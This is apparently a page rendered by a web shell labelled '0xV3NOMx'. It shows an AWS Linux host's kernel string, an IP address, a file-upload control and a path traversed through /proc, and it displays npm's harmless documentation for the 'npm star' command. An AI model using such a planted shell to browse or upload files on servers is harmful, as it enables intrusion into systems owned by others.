0xV3NOMx
Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64



Your IP : 3.145.72.55


Current Path : /proc/thread-self/root/usr/share/npm/doc/cli/
Upload File :
Current File : //proc/thread-self/root/usr/share/npm/doc/cli/npm-star.md

npm-star(1) -- Mark your favorite packages
==========================================

## SYNOPSIS

    npm star [<pkg>...]
    npm unstar [<pkg>...]

## DESCRIPTION

"Starring" a package means that you have some interest in it.  It's
a vaguely positive way to show that you care.

"Unstarring" is the same thing, but in reverse.

It's a boolean thing.  Starring repeatedly has no additional effect.

## SEE ALSO

* npm-view(1)
* npm-whoami(1)
* npm-adduser(1)